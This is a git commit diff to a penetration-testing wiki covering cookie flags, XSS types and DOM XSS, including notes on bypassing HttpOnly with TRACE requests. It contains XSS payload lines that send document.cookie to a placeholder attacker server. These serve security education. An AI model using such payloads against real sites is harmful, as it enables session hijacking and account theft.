GitBook: [master] 472 pages modified
This commit is contained in:
parent
5f83c0bdad
commit
e765a981c7
@ -119,6 +119,12 @@ A cookie with _**SameSite**_ attribute will **mitigate CSRF attacks** where a lo
|
||||
|
||||
This avoids the **client** to access the cookie \(Via **Javascript** for example: `document.cookie`\)
|
||||
|
||||
#### **Bypasses**
|
||||
|
||||
* This could be Bypassed with **TRACE** **HTTP** requests as the response from the server \(if this HTTP method is available\) will reflect the cookies sent. This technique is called **Cross-Site Tracking**.
|
||||
* This technique is avoided by **modern browsers by not permitting sending a TRACE** request from JS. However, some bypassed to this have been found in specific software like sending `\r\nTRACE` instead of `TRACE` to IE6.0 SP2.
|
||||
* Another way is the exploitation of zero/day vulnerabilities of the browsers.
|
||||
|
||||
### Secure
|
||||
|
||||
The request will **only** send the cookie in an HTTP request only if the request is transmitted over a secure channel \(typically **HTTPS**\).
|
||||
|
@ -67,6 +67,17 @@ In this case your input is reflected between **`<script> [...] </script>`** tags
|
||||
|
||||
There is **JS code** that is using **unsafely** some **data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
|
||||
|
||||
{% page-ref page="dom-xss.md" %}
|
||||
|
||||
### **Universal XSS**
|
||||
|
||||
These kind of XSS can be found **anywhere**. They not depend just on the client exploitation of a web application but on **any** **context**. These kind of **arbitrary JavaScript execution** can even be abuse to obtain **RCE**, **read** **arbitrary** **files** in clients and servers, and more.
|
||||
Some **examples**:
|
||||
|
||||
{% page-ref page="server-side-xss-dynamic-pdf.md" %}
|
||||
|
||||
{% page-ref page="../../pentesting/pentesting-web/xss-to-rce-electron-desktop-apps.md" %}
|
||||
|
||||
## WAF bypass encoding image
|
||||
|
||||
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
|
||||
@ -484,7 +495,10 @@ Remember to look into what is already loaded! jQuery is an easy example, but any
|
||||
## **DOM vulnerabilities**
|
||||
|
||||
There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
|
||||
**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**.**
|
||||
**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**:**
|
||||
|
||||
{% page-ref page="dom-xss.md" %}
|
||||
|
||||
There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**.
|
||||
Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
|
||||
|
||||
@ -592,6 +606,7 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
|
||||
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
|
||||
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
|
||||
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
|
||||
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
|
||||
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
|
||||
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
|
||||
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
|
||||
@ -609,6 +624,10 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
|
||||
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
|
||||
```
|
||||
|
||||
{% hint style="info" %}
|
||||
You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies.md#httponly) if you are lucky enough.
|
||||
{% endhint %}
|
||||
|
||||
### Port Scanner \(fetch\)
|
||||
|
||||
```javascript
|
||||
|
@ -12,6 +12,10 @@
|
||||
|
||||
Fundamentally, DOM-based vulnerabilities arise when a website **passes data from a source to a sink**, which then handles the data in an unsafe way in the context of the client's session.
|
||||
|
||||
{% hint style="info" %}
|
||||
**You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki)\*\*\*\*
|
||||
{% endhint %}
|
||||
|
||||
**Common sources:**
|
||||
|
||||
```javascript
|
||||
|
Loading…
Reference in New Issue
Block a user